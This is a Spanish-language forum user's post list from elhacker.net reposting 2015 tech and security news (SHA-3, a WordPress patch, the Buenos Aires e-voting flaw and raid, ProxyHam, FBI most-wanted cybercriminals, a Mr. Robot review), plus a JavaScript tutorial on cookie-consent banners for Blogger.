Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - el-brujo

#91
Un Hash es una herramienta criptográfica utilizada para generar una cadena única de bits de una longitud específica. Este sistema es utilizado para comprobar la integridad de un fichero, un documento o un mensaje y poder saber así si ha sido modificado o se mantiene intacto. El Hash es sin duda la mejor herramienta para la verificación de documentos, especialmente en lugares donde se trabaja habitualmente con documentos digitales. El Hash también puede ser utilizado para la generación de bits pseudoaleatorios, códigos de autenticación y funciones de derivación de claves.

El Instituto Nacional de Estándares y Tecnología (NIST, National Institute of Standards and Technology) ha publicado la versión final del algoritmo de Hash SHA-3, quienes lo han denominado, literalmente, como una herramienta de última generación para asegurar la integridad de la información. La nueva norma, que ha sido catalogada como Federal Information Processing Standard (FIPS) 202, se basa en una instancia de KECCAK, algoritmo que resultó ganador el pasado 2012 en el concurso Cryptographic Hash Algorithm Competition.

Aunque el algoritmo SHA-2 fue aprobado en el año 2002 aún sigue siendo un estándar seguro y fiable ya que en todo su tiempo de actividad no ha demostrado ni una sola debilidad. Según el NIST las versiones SHA-2 y SHA-3 se complementan entre sí dotando a los desarrolladores de hardware y de software de más opciones a la hora de desarrollar nuevos productos seguros. Algunas de las funciones de SHA-3, por ejemplo, pueden implementarse en un dispositivo preparado para SHA-2 sin necesidad de modificar el diseño aprovechando tan solo los componentes ya ensamblados o añadiendo un pequeño número de circuitos al chip.




SHA-3 es muy diferente al actual SHA-2, sin embargo el NIST afirma que este nuevo algoritmo no pretende sustituir de momento al actual SHA-2, quien no ha demostrado por el momento ninguna vulnerabilidad, sino que simplemente pretende ser un salvoconducto por si ocurre algo con el estándar actual. Los investigadores de seguridad afirman que se tardan años en crear un nuevo estándar, y por ello han querido estar preparados para el futuro desarrollando y estandarizando este nuevo algoritmo que, sin duda, protegerá de la mejor forma posible la información de los usuarios.

El desarrollo de SHA-3 comenzó hace 10 años por temor a que aparecieran en SHA-2 vulnerabilidades similares a las de SHA-1. 13 años desde el lanzamiento de SHA-2 el algoritmo sigue siendo seguro y fiable y, en el caso de que apareciera alguna vulnerabilidad en él, ya tenemos un sustituto aprobado para poder aguantar varios años más.

Fuente:
http://www.redeszone.net/2015/08/07/sha-3-nuevo-estandar-hash-aprobado-nist/
#92
Actualización de seguridad para WordPress

Se ha publicado la versión 4.2.4 de WordPress que soluciona seis nuevas vulnerabilidades que podrían permitir el compromiso de sitios web.


WordPress es uno de los administradores de contenido, o CMS, más utilizados de la red. Millones de páginas web, blogs y portales utilizan esta plataforma para ofrecer contenido dinámico a sus usuarios, por ello mantener el sistema actualizado es vital para evitar que los piratas informáticos puedan tomar el control de nuestro sitio web. Antes del lanzamiento de la versión 4.3 los desarrolladores han querido publicar una nueva revisión de seguridad, 4.2.4, con la que solucionar un total de 6 vulnerabilidades importantes que podían comprometer la seguridad de los sitios web que utilicen esta plataforma.


Esta nueva versión del CMS soluciona 3 vulnerabilidades cross-site scripting y una vulnerabilidad de SQL injection que podía ser explotada para comprometer la seguridad y la integridad de los sitios web. En esta actualización también se protege a los usuarios contra posibles ataques side-channel y soluciona un fallo que permitía a piratas informáticos bloquear temas y evitar que estos pudiesen editarse por los editores o administradores del sitio web.


Wordpress es un sistema de gestión de contenidos enfocado a la creación de blogs desarrollado en PHP y MySQL, ampliamente usado en la comunidad de bloggers debido a su facilidad de uso y sus características como gestor de contenidos.

Esta actualización incluye la corrección de tres vulnerabilidades de cross-site scripting y una inyección SQL que podrían permitir el compromiso del sitio. También se soluciona un potencial ataque "timing side-channel" y evita que un atacante bloquee la edición de una publicación.

Además está versión contiene la corrección de otros cuatro bugs no relacionados directamente con problemas de seguridad.

Dada la importancia de los problemas corregidos se recomienda la actualización de los sistemas a la versión 4.2.4 disponible desde:

https://wordpress.org/download/

O bien desde el dashboard, Actualizaciones (Updates), Actualizar Ahora (Update Now). Los sitios que soporten actualizaciones automáticas ya han iniciado la actualización a WordPress 4.2.4.

Más información:

WordPress 4.2.4 Security and Maintenance Release
https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/


Fuentes:
http://www.redeszone.net/2015/08/05/wordpress-4-2-4-soluciona-6-vulnerabilidades-importantes/
http://unaaldia.hispasec.com/2015/08/actualizacion-de-seguridad-para.html
#93
Noticias / VLC se actualiza para Windows 10
10 Agosto 2015, 11:38 AM
Con la salida de Windows 10 muchas de las aplicaciones favoritas de los usuarios están lanzando actualizaciones que se adaptan mejor al SO. Una de ellas sin duda es VLC, cuyos responsables han anunciado este fin de semana la llegada de una renovación del reproductor multimedia para W10.



Se trata de una actualización bastante generosa que afecta tanto al diseño como a las características que trae de serie. Para empezar, lo que hasta ahora era "VLC para Windows 8" pasa a llamarse "VLC para Windows Store", junto a las siguientes novedades y especificaciones:

    Uso del plugin Direct3D con la librería TagLib
    Mejora en el soporte para subtítulos (SSA)
    Soporte de vídeos 10 bits
    Reconocimiento de metaetiquetas en ficheros de vídeo y música
    Nueva página principal con los elementos favoritos del usuario
    Recomendaciones musicales en la página principal
    Pestaña de artistas en la librería musical
    Botón para añadir elementos a la playlist
    Nuevo motor de búsqueda

En definitiva, una gran actualización con la que VLC recibe un lavado de cara con el lanzamiento de Windows 10. Aquellos que deseen descargar esta nueva versión deberán acceder al enlace de Windows Store.

Fuentes:
http://www.elotrolado.net/noticia_vlc-se-actualiza-para-windows-10_26961
http://blog.thomasnigro.fr/2015/08/07/vlc-1-5-on-the-road-to-windows-10/
#94
Deshabilitar Cookies en Blogger

Editar Plantilla HTML:

Después del Title (o sea que esté en el head)

Código (javascript) [Seleccionar]
<SCRIPT>
cookieChoices = {};
</SCRIPT>



Añadir script de Google:

http://www.cookiechoices.org/cookiechoices.zip

Dentro del zip hay el fichero cookiechoices.js

Añadir después de la siguiente línea:

Código (javascript) [Seleccionar]
document.getElementById(dismissLinkId).onclick = _dismissLinkClick;

esto para que al hacer scroll desaparezca el aviso (consideramos que si está navegando acepta nuestra política de Cookies, navegar = scroll).

Código (javascript) [Seleccionar]
document.onscroll = _dismissLinkClick;

La cookie caduca por defecto en 1 año:

Podemos poner + 3 años:

Código (javascript) [Seleccionar]
expiryDate.setFullYear(expiryDate.getFullYear() + 3);

Y añadir el "path=/" para que no aparezca el aviso en todas las páginas del dominio:

Código (javascript) [Seleccionar]
document.cookie = cookieName + '=y; path=/; expires=' + expiryDate.toGMTString();

O otra opción es colocar la cookie en culaquier subdominio de .elhacker.net, es decir *.elhacker.net , de manera que si el nombre de la cookie (displayCookieConsent) y el valor es "y" y la acepta en un subdominio sirve para el resto de los dominios.

Código (javascript) [Seleccionar]
document.cookie=cookieName+'=y; expires='+expiryDate.toGMTString()+'; domain='+getDomainName(window.location.host)+'; path=/';

Debemos añadir la función  getDomainName en el fichero cookiechoices.js

Código (javascript) [Seleccionar]
/*
function getDomainName(hostName){if(hostName.lastIndexOf(".")==hostName.indexOf(".")){return hostName}return hostName.substring(hostName.indexOf(".")+1)}
*/

function getDomainName(hostName)
{return hostName.substring(hostName.lastIndexOf(".",hostName.lastIndexOf(".")-1)+1);}


Y cambiamos el nombre de la variable cookieChoices por cookieOpciones

Ahora ponemos el código en la plantilla de nuestro sitio web dentro del body (no en el head)

Código (html4strict) [Seleccionar]
<script src="//www.elhacker.net/inclusiones/plantillas/006/cookiechoices.js"></script>
<script>
 document.addEventListener('DOMContentLoaded', function(event) {
   cookieOpciones.showCookieConsentBar('Este sitio web utiliza cookies propias y de terceros. Si continúas navegando, consideramos que aceptas su uso.',
                                      'Vale', 'Más info', 'http://www.elhacker.net/legal.html');
 });
</script>


Podemos cambiar el texto del aviso de Cookies, y el texto de más información y el del ok, o Entendido o Vale, De Acuerdo, etc.

El js de blogger por defecto es:

Código (javascript) [Seleccionar]
<!-- 'Tú eres el responsable de informar a los visitantes de tu blog de las cookies que utilizas en él. Para más información, ve a http://www.blogger.com/go/cookiechoices.' -->
<script src="/js/cookiechoices.js" defer></script>
<script>
 document.addEventListener('DOMContentLoaded', function(event) {
   window.cookieChoices && cookieChoices.showCookieConsentBar && cookieChoices.showCookieConsentBar(
       (window.cookieOptions && cookieOptions.msg) || 'Este sitio emplea cookies de Google para prestar sus servicios, para personalizar anuncios y para analizar el tráfico. Google recibe información sobre tu uso de este sitio web. Si utilizas este sitio web, se sobreentiende que aceptas el uso de cookies.',
       (window.cookieOptions && cookieOptions.close) || 'Entendido',
       (window.cookieOptions && cookieOptions.learn) || 'Más información',
       (window.cookieOptions && cookieOptions.link) || 'https://www.blogger.com/go/blogspot-cookies');
 });
</script>


Para cambiar el texto:

Código (javascript) [Seleccionar]
<script>
cookieOptions = {msg: "Este sitio web utiliza cookies propias y de terceros. Si continúas navegando, consideramos que aceptas su uso", close: "Vale", learn: "Más info", link:"http://www.elhacker.net/legal.html"};
</script>



Para modificar  la apariencia: style:

Código (css) [Seleccionar]
<b:skin><![CDATA[

#cookieChoiceInfo {
position:absolute !important;
width:40% !important;
background-color:#eee !important;
left:38% !important;
color: #333 !important;
font-size: 10px !important;
font-weight:normal !important;
padding:4px !important;
margin:0; !important;
z-index:1000 !important;
line-height:1% !important;
}      


Para cumplir la ley debemos esperar a que el usuario acepte las cookies antes de cargarlas:

Código (javascript) [Seleccionar]
<script>
function carga_cookies(){
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

 ga('create', 'UA-xxxxxxx', 'auto');
 ga('send', 'pageview');
}
</script>


Y una vez acepte las cookies llamamos a la función:

Código (javascript) [Seleccionar]
carga_cookies();


Google Analytics sin recoger datos de país (cookie técnica)

https://developers.google.com/analytics/devguides/collection/analyticsjs/field-reference#anonymizeIp

https://github.com/ItalyCookieChoices/italy-cookie-choices/wiki/Analytics-and-Cookie-Law

Código (javascript) [Seleccionar]
<script>
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

 ga('create', 'UA-XXXXXXX-X',  {'siteSpeedSampleRate': 100, 'anonymizeIp': true, 'storage': 'none', 'clientId': window.localStorage.getItem('ga_clientId')});
 ga(function(tracker) {
   window.localStorage.setItem('ga_clientId', tracker.get('clientId'));
 });
 ga('send', 'pageview');

</script>


Otra opción más completa es usar jquery:


Código (html4strict) [Seleccionar]
<script src="js/jquery-1.11.0.min.js"></script>
<script src="js/jquery.cookie.js"></script>
<script src="js/jquery.cookiecuttr.js"></script>


En el cookiecuttr.js cambiar el texto, link info cookies,

Código (javascript) [Seleccionar]
cookieMessage:
cookiePolicyLink:


Y cargar en el <body>

Código (javascript) [Seleccionar]
<script>
$(document).ready(function () {
$.cookieCuttr();
$( window ).scroll(function() {
if (jQuery.cookie('cc_cookie_accept') == undefined) {
 $( ".cc-cookie-accept" ).click();
}
});
$( window ).click(function() {
if (jQuery.cookie('cc_cookie_accept') == undefined) {
 $( ".cc-cookie-accept" ).click();
}
});
});
</script>


Otra opción interesante es un script que cumple con la ley con Google Adsense y Google Analytics:

https://github.com/ecoal95/CookieTool/blob/master/src/cookietool.js

http://emiliocobos.net/script-ley-de-cookies/
http://emiliocobos.net/ley-de-cookies-y-adsense/
#95
Resource Hacker™
Version 4.2.4
Last updated: 6 July 2015
Copyright © 1999-2015 Angus Johnson
Freeware - no nags, no ads and fully functional.

Uno de los "editores de recursos" más antiguos y conocidos. Creo que es un de los favoritos de Karmany xD

CitarOverview:

Resource Hacker™ has been designed to be the complete resource editing tool: compiling, viewing, decompiling and recompiling resources for both 32bit and 64bit Windows executables. Resource Hacker™ can open any type of Windows executable (*.exe; *.dll; *.scr; *.mui etc) so that individual resources can be added modified or deleted within these files. Resource Hacker™ can create and compile resource script files (*.rc), and edit resource files (*.res) too.



Descargar Resource Hacker Portable:
http://www.angusj.com/resourcehacker/resource_hacker.zip

Fuente:
http://www.angusj.com/resourcehacker/
#97
Voto electrónico: allanaron la casa de un técnico que denunció falencias en el sistema

Se trata de Joaquín, un técnico informático que manifestó que podrían enviarse datos falsos al escrutinio del domingo a la noche. Peritos de la Metropolitana secuestraron varios equipos que se encontraban en el domicilio.




Joaquín Sorianello, un técnico informático que dijo haber detectado falencias en el sistema de voto electrónico que los porteños utilizarán mañana para elegir al próximo Jefe de Gobierno, denunció que anoche la Policía Metropolitana allanó su domicilio en Caballito y se llevó del lugar equipos electrónicos.

Según supo Clarín, el operativo comenzó cerca de las 22 y terminó después de la medianoche. La orden fue dada por la jueza María Luisa Escrich, informó durante la madrugada la agencia de noticias Télam.

El técnico fue quien a través de su cuenta de Twitter dio a conocer lo que estaba ocurriendo en su domicilio. Y pronto, sus declaraciones se replicaron a través de esa misma red social. "Después de encontrar una vulnerabilidad grave en el sistema de voto electrónico a #MSA están allanando mi casa, los de delitos informáticos", escribió el técnico, que se encontraba en Bariloche mientras el operativo se llevaba a cabo. Y en otra oportunidad, agregó: "Según me cuentan, están allanando casas de más gente que denunció la farsa del #VotoElectrónico".

Durante el allanamiento fueron secuestrados equipos electrónicos como computadoras, kindles y dispositivos para almacenar información.

La denuncia de Joaquín sobre la falencia en el sistema de voto electrónico sostiene que fueron publicados en Internet los "certificados de los terminales que envían los datos desde las ecuelas al centro de cómputos". Y que de esta manera "cualquier persona malintencionada podría con estos certificados SSL enviar resultados falsos del escrutinio y también podría realizar un ataque de denegación de servicio. Es decir, transmitir tantos resultados que hagan que el sistema no pueda procesar los recuentos genuinos".

Según detalla Télam, el Sistema de Boleta Única Electrónica (BUE) que se implementará el domingo, utiliza dos máquinas: una es el terminal de votación con el que interactúan los votantes y se realiza el recuento. La otra, es la que se usa para transmitir los datos del escrutinio desde cada escuela al centro de cómputos.

Esta segunda máquina está conectada a Internet y es la que mediante los certificados SSL obtenidos podría ser clonada.




[youtube=640,360]https://www.youtube.com/watch?v=JzFHaPqoLZQ[/youtube]

Fuente:
http://www.clarin.com/policiales/Voto-electronico-allanaron-domicilio-irregularidades_0_1387661308.html

Más info:
Vot.Ar permite sumar múltiples votos con una sola boleta #Multivoto
http://blog.segu-info.com.ar/2015/07/votar-permite-sumar-multiples-votos-con.html

Cómo votar múltiples veces con el sistema Vot.AR este domingo en Buenos Aires (Argentina)
http://www.elladodelmal.com/2015/07/como-votar-multiples-veces-con-el.html
#98
El investigador de seguridad Benjamin Caudill ha desarrollado un dispositivo que añade una capa extra de anonimato a informantes, periodistas, disidentes y, por supuesto, los criminales.



Bautizado como ProxyHam, es un "proxy de hardware" que permite a los usuarios conectarse a una red Wi-Fi pública y a larga distancia sobre un canal de radio de baja frecuencia no identificables, haciendo más difícil para las agencias gubernamentales y espías descubrir la verdadera identidad y origen del tráfico de Internet.
¿Cómo funciona Proxyham?
Proxyham se compone de un Raspberry Pi conectada a una tarjeta WiFi USB, junto con una instalación de tres antenas. Una antena se utiliza para conectar a una red Wi-Fi en un lugar público, y las otras dos antenas se utilizan para transmitir la señal de Wi-Fi a una frecuencia de 900 MHz.

ProxyHam hace uso de una conexión de radio para añadir una capa física de ofuscación en el intento por localizar al usuario de Internet. Por depender de una conexión de radio de 900 MHz, ProxyHam se puede conectar a un Wi-Fi lejano en un rango de entre 1 y 2,5 millas (4Km), dependiendo de ciertos factores de interferencia.

La idea es la de esconder esa caja en algún lugar público y luego beneficiarse de esas ventajas. Por lo tanto, en caso de que se logre trazar completamente la conexión a Internet de destino, sólo se encontrará la dirección IP de ProxyHam a cientos o miles de metros de la conexión real.

Caudill dice que están trabajando en agregar características adicionales como la autodestrucción de ProxyHam. Caudill presentará ProxyHam en la Conferencia DefCon en Las Vegas el próximo mes así como las especificaciones de hardware, el código fuente y el modelo del dispositivo para que cualquier persona puede desarrollar su propia versión.

Fuente: HackerNews

Fuente:
http://blog.segu-info.com.ar/2015/07/proxyham-wi-fi-anonimo-4-km-de-alcance.html
#99
Durante el primer trimestre de 2015 los cibercriminales han incrementado sus esfuerzos por hacer su agosto a costa de los usuarios de la plataforma móvil de Google, hasta tal punto que se ha llegado a registrar un nuevo malware para Android cada 17,6 segundos.

El objetivo de estos delincuentes es claro, utilizar malware capaz de infectar al mayor número posible de usuarios, algo que los lleva a poner sus ojos de forma permanente en el pequeño androide verde, ya que es el sistema operativo móvil más utilizado en todo el mundo.

Según información recopilada por la firma G DATA durante el primer trimestre de este año se identificaron 440.267 nuevas muestras de malware diseñadas específicamente para atacar a Android, lo que se traduce en una media de 4.900 al día.

Estos números reflejan un incremento del 6,4% frente al último trimestre del año pasado y de un 21% si comparamos con el mismo trimestre del año pasado.

De estas nuevas amenazas un 50,3% tienen motivaciones económicas directas y buscan robar información bancaria o forzar el envío de SMS premium, aunque si contamos aquellas que buscan obtener beneficios económicos de forma no directa el porcentaje crece enormemente.

Como se diría es el precio de la fama, una realidad que afecta a Windows desde hace más de dos décadas y que poco a poco ha ido salpicando también a Android.




Más información: Softpedia.

Fuente:
http://www.muycomputer.com/2015/07/03/nuevo-malware-para-android-cada-17-segundos
#100


Mr. Robot: la serie sobre el mundo de los hackers
Por Luis García Fanlo

En la serie Scorpion los hackers trabajan para el gobierno, en Person of Interest querían derrocar al gobierno, en House of Cards vivir bien y hacerle la vida imposible a corporaciones y el FBI; en general los hackers no tienen un gran protagonismo en series de televisión y películas y cuando lo tienen, aunque sea en roles secundarios, generalmente se los representa bajo biotipos estereotipados que oscilan entre el nerd y el experto en informática o creadores de software. El hacker suele ser el pirata informático que sirve a algún propósito de otros y que en general su personalidad, su habitus, se presenta de modo bastante unidimensional. Pero hacker, lo que se dice hacker en terminos estrictos, es otra cosa.



Los primeros hackers nacieron a principios de los '60, en el Massachusetts Institute of Technology (MIT) ya que así se autodenominaban los que participaban del Tech Model Railroad Club (TMRC) como hacks, bromistas. En 1984 se publica el libro de Steven Levy, Hackers: heroes of the computer revolution en el que por primera vez se habla de la ética-hacker cuyos pilares son el libre acceso a la información y el código fuente del software. La ética hacker tendría seis fundamentos, a saber: el acceso a los computadores debe ser ilimitado y total, toda información debería ser libre; es necesario promover la descentralización y desconfiar de las autoridades, los hackers deberían ser juzgados por su labor y no por cosas como su raza, edad o posición social, se puede crear arte y belleza en un computador, las computadoras pueden cambiar tu vida para mejor.


Sin duda que ha corrido mucha agua debajo de este puente y que las controversias son enormes, y eso sin mencionar a los creadores de virus, navegantes de la deep web, partidos piratas, sitios de torrents y descargas de música, videos, series y películas, Anonymous, y los que proveen información a las Wikis, Assange, Snowden y demás. También se habla de los hackers que una vez que han sido detenidos son obligados a trabajar para el gobierno nortemericano o corporaciones de software, o sencillamente los que con el paso de los años deciden dejar de ser malos muchachos y ponerse un traje de Armani. Para quien esté interesado hay información a destajo en la Web, solo hay que buscar, leer y hacerse una opinión o hacerse hacker.

Esta introducción viene a cuento del estreno de la (¿primera?) serie de televisión sobre hackers titulada Mr. Robot que se estrena el 24 de junio de 2015 por USA NETWORK aunque su episodio piloto circuló tiempo antes por la Web. La serie tiene como particularidad que, salvo por el papel secundario que interpreta Christian Slater personificando al extraño Mr. Robot (aclaro desde ya que no es un robot ni tiene nada que ver con los robots), el resto del cast, el creador de la serie, sus productores y showrunner son casi desconocidos dentro del ambiente seriéfilo y de la industria televisiva.

El protagonista es el actor norteamericano Rami Malek (The Pacific), Sam Esmail (Comet) el creador de la serie y guionista y Steve Golin (True Detective), fundador de Anonymous Content LLP su productor ejecutivo; el episodio piloto fue dirigido por Niels Arden Oplev a quien quizás alguien haya oído nombrar por su participación en Under The Dome. No hay mucho más para agregar en lo que se refiere a la producción de la serie, excepto que la emisión del episodio piloto tuvo un gran impacto positivo en la crítica periodística y en la audiencia a pesar de que la difusión que ha tenido hasta el momento ha sido casi nula o insignificante, de hecho son muy pocos los que conocen de su existencia.

La serie tiene como protagonista al personaje de Elliot Alderson, un joven taciturno, solitario, tímido y reservado que trabaja en una compañía que vende servicios de seguridad informática a grandes corporaciones empresariales pero que por las noches, como un vengador anónimo, se dedica a realizar ataques informáticos para desenmascarar a quienes violan la ley perjudicando a personas inocentes, como es el caso del dueño del bar que regentea una red de pornografía infantil por Internet. A Elliot no le interesa el dinero, ni la fama, no quiere ser un superhéroe sino alguien que simplemente usa sus saberes informáticos para cumplir el mandato que su conciencia le dicta. Vive entre dos mundos que son antitéticos, aunque él mismo no lo ve de esa manera ya que si bien es un hacker no lo moviliza la política hacker sino su propia motivación individual.

Hasta que conoce al misterioso Mr. Robot que intentará reclutarlo para que forme parte de un grupo hacker militante que se ha propuesto un plan para derrocar el capitalismo. No cuento más. Pero agrego, que las actuaciones son muy buenas, la composición de las imagenes y los discursos, la puesta en escena y por sobre todo la ausencia de linealidad en la trama, están manejadas en forma brillante haciendo de un argumento que en principio parece simple y previsible una experiencia en la que por momentos los espectadores no sabemos bien de qué va la cosa y hacia dónde va.

[youtube=640,360]https://www.youtube.com/watch?v=nJNZF3LR0VM[/youtube]

Mr. Robot es una serie que tiene imaginación y concepto a la hegeliana, es decir, algo más que una mera reproducción o representación de esos estereotipos o lugares comunes sobre los hackers y que por sobre todas las cosas resulta verosímil no solo en términos de género sino, principalmente, en sus efectos de realidad. Vemos la serie y decimos -sin saberlo, claro- esto es un hacker, esto es hackear. Desde ese no saber, que es el saber del sentido común, entendemos que ser hacker es una práctica y que esa práctica tiene múltiples perspectivas y modulaciones. No tengo idea que opinarán de la serie los hackers de la vida real pero a mi me gustó y desde ya la recomiendo. Eso sí, tengan a mano Google o un amigo que sepa sobre protocolos, algoritmos, etcétera, ya que forman parte importante de los diálogos y aunque no son decisivos conocer qué significan para seguir y entender la historia le dan un plusvalor cognitivo que, además, nos enriquecerá intelectualmente y, quien les dice, nos llevará a convertirnos en hackers.

Fuente:
http://negrowhite.net/mr-robot-la-serie-sobre-el-mundo-de-los-hackers/

Más info:
http://hipertextual.com/2015/06/mr-robot-serie
#101
Cisco se ha hecho de OpenDNS para fortalecer sus servicios de seguridad en la nube. OpenDNS seguirá ofreciendo su paquete gratuito, pero se espera que se integra a la oferta de Cisco más adelante.


OpenDNS es un servcio que cambia la configuración DNS para agregar un nivel adicional de seguridad y control en Internet de acuerdo a un monitoreo que realiza de los dominios. Además de proteger a los usuarios de phishing y malware, permite hacer filtrado de contenidos y acelera la navegación.

Gracias a esa capa adicional de seguridad que agrega OpenDNS al Internet, Cisco ha decidido comprar a dicha empresa por la cantidad de US$635 millones de dólares en efectivo. De acuerdo a Security Week, Cisco mejorará su seguridad en la nube con esta adquisición y con el tiempo combinará sus servicios con los de OpenDNS, para ofrecer soluciones integrales basados en la nube.

Los empleados actuales de OpenDNS, pasarán a ser parte del Grupo de Seguridad en Negocios de Cisco. Y, al menos por el momento, OpenDNS seguirá ofreciendo su paquete gratuito del servicio. David Ulevitch, fundador y CEO de OpenDNS, escribió a sus empleados:

    "Hemos tomado la decisión de vender OpenDNS porque creo que podemos llevar a nuestros increíbles equipos y tecnologías, y aprovechar los recursos, alcance y escala de Cisco para ofrecer mejores productos de forma más rápida..."

Se espera que la transacción se concluya en el primer cuarto fiscal del 2016. Enhorabuena OpenDNS, que los cambios que vengan, sean para mejorar.
#102
Debía haberse presentado el pasado 30 de Junio, pero debido a algunos problemas de estabilidad que ha habido que solucionar a última hora, no ha sido hasta hoy cuando Mozilla ha anunciado una nueva versión de su navegador, disponible ya para las principales plataformas de escritorio y móvil.

Firefox 39 nos llega con varias novedades interesantes tanto para usuarios como desarrolladores.


Entre ellas la más llamativa es la posibilidad de compartir enlaces e invitar a conversaciones en Firefox Hello, utilizando las redes sociales: twitter, Facebook, Linkedin, Pocket, Google +, tumblr, Weibo, VK...y de esa manera sacar todo el rendimiento de ese servicio que utilizando la tecnología abierta WebRTC, nos permite realizar videoconferencias desde el navegador simplemente compartiendo una URL, sin necesidad de descargar ningún tipo de software adicional.

Ahora también se comprueba que las descargas en sistemas Linux y OS X estén libre de malware, comparándolo el hash del archivo descargado con la base de datos de Google (algo que ya se hacía en Windows desde hace tiempo).

Hablando de seguridad comentar que se elimina el protocolo SSLv3 para comunicaciones de red, dado que se ha descubierto que era inseguro.

Secure Sockets Layer versión 3.0 (SSLv3) no es lo suficientemente seguro
http://blog.elhacker.net/2015/06/secure-sockets-layer-version-30-sslv3-no-es-lo-suficientemente-seguro-usa-tls.html

Los usuarios de OS X reciben un poco de amor adicional gracias al proyecto Silk ("seda"), que pretende optimizando el uso de Vsync en el navegador que mejora el comportamiento de las animaciones y proporciona un desplazamiento más suave.

Otra novedades a destacar: se mejora la representación del color en emojis creados en formato Unicode 8.0, soporte ampliado para tecnologías HTML5, el rendimiento del plugin-container ya no es tan penoso como antaño, y se optimizar el soporte para la especificación WAI-ARIA 1.1 (entre otras cosas sirve para mejorar la accesibilidad en las páginas web).

Firefox 39 ya está disponible para su descarga desde la web del proyecto para todo tipo de tipo de sistemas operativos (Linux, OS X, Android, Windows...).

Como siempre los usuarios de GNU/Linux tan solo tenemos que esperar, que nuestra distro actualice la versión en las próximas horas o días, para empezar a disfrutar de Firefox 39

Fuente:
http://lamiradadelreplicante.com/2015/07/03/firefox-39-el-navegador-de-mozilla-se-vuelve-mas-social/
#103
Las fuerzas policiales de varios países de todo el mundo llevan años adaptándose a las nuevas formas de crimen. Solo hay que ver algunas de las operaciones realizadas recientemente para comprobar como los ciberdelincuentes son una de sus prioridades. No obstante, hay cibercriminales que aún no han podido ser detenidos e incluso se están ofreciendo importantes cantidades de dinero por ellos.
Los más buscados

Recientemente, el FBI ha actualizado su lista de ciberdelincuentes más buscados, ofreciendo, en algunos casos, cuantiosas recompensas a quien proporcione información que conduzca a la detención del sospechoso. Entre estos delincuentes encontramos personas de distintas nacionalidades y que han cometido delitos telemáticos de varios tipos.

Veamos pues, y como si de una vieja película del oeste se tratase, quiénes son los ciberdelincuentes más buscados:

El FBI ofrece 3 millones de dólares de recompensa por el responsable de una botnet
http://blog.elhacker.net/2015/02/el-fbi-ofrece-3-millones-de-dolares-de-recompensa-por-el-creador-botnet-gameover-zeus-ruso-bogachev.html

1.- Evgeniy Mikhailovich Bogachev

Recompensa: 3 millones de dólares



El que, si nos atenemos a la recompensa ofrecida, es el cibercriminal más buscado por el FBI, es un ciudadano ruso buscado principalmente por ser el creador de Zeus. Este malware infecta los sistemas y los incluye en una red de ordenadores zombis o botnet, quedando estos a merced del ciberdelincuente.

Además, Zeus se ha usado durante varios años para robar credenciales de acceso a banca online, contraseñas de múltiples servicios y otros datos personales de las víctimas. A Bogachev se le acusa de haber configurado todo el esquema de infección y robo de información de Zeus, esquema que luego copiarían multitud de criminales.

Tanto Zeus como sus variantes más conocidas (GameOver Zeus, por ejemplo) son consideradas una de las amenazas que más problemas han causado y que más dinero han conseguido robar. Se calcula que los beneficios que han reportado a los delincuentes que han utilizado Zeus o alguna de sus variantes a lo largo de estos años ascenderían a varios cientos de millones de dólares.


2.- Nicolae Popescu

Recompensa: 1 millón de dólares



Este ciberdelincuente de nacionalidad rumana está especializado en realizar estafas a través de Internet, vendiendo artículos de lujo que finalmente no enviaba en webs de subastas como eBay.com. A través de una empresa ficticia ubicada supuestamente en varios países europeos, Popescu y sus compinches publicaban sus anuncios esperando que algún usuario cayese en la trampa atraído por el interesante precio, normalmente muy por debajo del valor de mercado del artículo en venta.

Cuando el posible comprador adquiría el artículo procedía a pagarlo ingresando el dinero mediante transferencia en alguna de las cuentas que los colaboradores de Popescu tenían asignadas en diferentes bancos de todo el mundo para luego transferirle el dinero a él.

Junto a sus colaboradores, Popescu creó una red internacional de estafadores acusados de cometer fraude electrónico, blanqueo de capitales o utilización de documentación falsa, entre otros delitos por los que anda en busca y captura desde finales de 2012.


3.- Alexsey Belan


Recompensa: 100.000 dólares



Este joven de nacionalidad rusa está acusado de haberse introducido ilegalmente en las redes de tres de las empresas de comercio electrónico más grandes de Estados Unidos entre enero de 2012 y abril de 2013. Se le atribuye el robo de datos y contraseñas de millones de cuentas de usuario, datos que después vendió para obtener un beneficio económico.

Sobre él pesan dos órdenes de arresto por dos delitos tras haber sido acusado de intrusión y obtención de datos de forma ilícita, posesión de dispositivos de acceso no autorizados, fraude informático y robo de identidad.


4.- Peteris Sahurovs

Recompensa: 50.000 dólares



A Peteris Sahurovs se le busca por su involucración en un esquema internacional de cibercrimen que tuvo lugar entre febrero y septiembre de 2010. Durante este tiempo se encargó de distribuir falsas soluciones de seguridad a usuarios, causándoles pérdidas por valor de 2 millones de dólares en total.

La técnica de Sahurovs para infectar a sus víctimas fue bastante ingeniosa. Primero contactó con un periódico online haciéndose pasar por un empleado de una agencia de publicidad online que buscaba sitios web donde ubicar anuncios de un hotel que decía representar.

Una vez hubo engañado al periódico online para que publicase los falsos anuncios del hotel, los cambió por un fichero que contenía código malicioso y que infectaba las máquinas de los usuarios que visitaban el periódico online y les solicitaba que pagasen por una falsa solución antivirus para desinfectar el sistema.

En caso de no hacerlo, los usuarios veían cómo sus sistemas se inundaban de ventanas emergentes con publicidad, falsas alertas de seguridad y se perdía el acceso a los ficheros almacenados en el sistema, de forma similar a lo que ocurre con el ransomware actualmente.

A Sahurovs se le cree responsable de haber repetido esta técnica numerosas veces en distintas webs y por eso se le acusa de fraude electrónico y acceso no autorizado a ordenadores ajenos.
5.- Shaileshkumar P. Jain y Bjorn Daniel Sundin

Recompensa: 20.000 dólares cada uno





